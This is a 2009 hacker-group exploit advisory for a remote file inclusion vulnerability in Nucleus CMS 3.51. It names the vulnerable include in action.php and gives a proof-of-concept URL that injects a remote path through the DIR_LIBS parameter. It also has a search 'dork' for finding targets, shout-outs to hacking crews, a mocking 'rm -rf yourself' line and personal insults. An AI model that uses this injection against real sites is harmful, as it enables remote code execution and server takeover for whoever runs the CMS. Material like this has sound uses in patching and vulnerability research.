/**************************************************************************
[!] Nucleus CMS Remote File Include Vulneralbility
[!] Author : Don Tukulesto (root@indonesiancoder.com)
[!] Homepage : http://www.indonesiancoder.com
[!] Date : November 30, 2009
[!] Tune In : http://antisecradio.fm (choose your weapon)
**************************************************************************/
[ Software Information ]
[+] Nucleus: PHP/MySQL Weblog CMS (http://nucleuscms.org/)
[+] Download : http://sourceforge.net/projects/nucleuscms/files/
[+] Version() : 3.51
[+] Nucleus allows you to easily maintain your own weblog(s) on your own server.
It offers a system that is easy to install, but still offers maximum flexibility.
[+] Method : Remote File Inclusion
[+] Dork : "Don Tukulesto is LAMMER"
===========================================================================
[ Vulnerable File ]
[+] action.php
Fatal error on line 25
include_once($DIR_LIBS . 'ACTION.php');
[ Proof of Concept ]
http://127.0.0.1/action.php?DIR_LIBS=[INDONESIANCODER-666]
===========================================================================
[ Who The Hell Has Control of That Damn Smoke Machine ]
[~] INDONESIAN CODER TEAM - KILL-9 CREW - MainHack Brotherhood - ServerIsDown
[~] kaMtiEz, M3NW5, arianom, Contrex, tiw0L, Pathloader, abah_benu, Saint, Cyb3r_tr0n, M364TR0N, VycOd,
[~] Jack-, Yadoy666 + miya666, s4va, senot, Bayu5154, Gonzhack, Tucker, Ian Petrucii, Ronz & FeeLCoMz
[~] kecemplungkalen, DraCoola Multimedia, XNITRO, rey_cute, Awan Bejat, Plaque, Gh4mb4s and YOU!!
[ rm -rf yourself ]
[>] FOR MALINGSIAL
[ Note ]
[+] Rest In Peace R.T.O AKA SATAN BLASTED
[+] Thank you to ALL OF YOU called me piece of shit, especially for High school friends